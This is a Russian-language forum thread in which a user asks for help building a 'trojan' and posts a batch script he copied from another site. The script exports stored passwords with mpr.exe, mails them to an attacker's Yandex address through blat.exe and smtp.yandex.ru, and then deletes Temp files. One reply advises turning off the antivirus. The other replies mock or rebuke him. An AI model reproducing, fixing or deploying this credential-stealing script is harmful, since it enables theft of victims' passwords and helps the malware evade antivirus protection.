Николай

помогите с созданием трояна

я вычитал в инете http://zzunor.3dn.ru/forum/9-7-1 про троян сделал как всё сказано, когда сохроняю эти строки
@echo off
:start
ping ya.ru -n 5 >nul
if %errorlevel%==0 (goto send) else (goto end)

:end
goto :start

:send
blat.exe -install -server smtp.yandex.ru -port 587 -f твой логин@yandex.ru -u логин -pw пароль
mpr.exe /export
ren *.mpf pass.mpf
blat.exe -bоdу PassReg -to кому отправлять@yandex.ru -attach pass.mpf
del %Temp%\*.* /Q /S /F

сохраняется через пару секунд этот файл в формате бат исчезает что делать?

Алексей Кузнецов

антивир выключи

Карина

засранец ты у меня из-за таких как ты комп чуть не полетел =((

Linar

дано за создание подобного ПО на зоне не сидел?

Виктор Дейнеко

Совсем школота поопухла. Решил что круто заварен, чайник?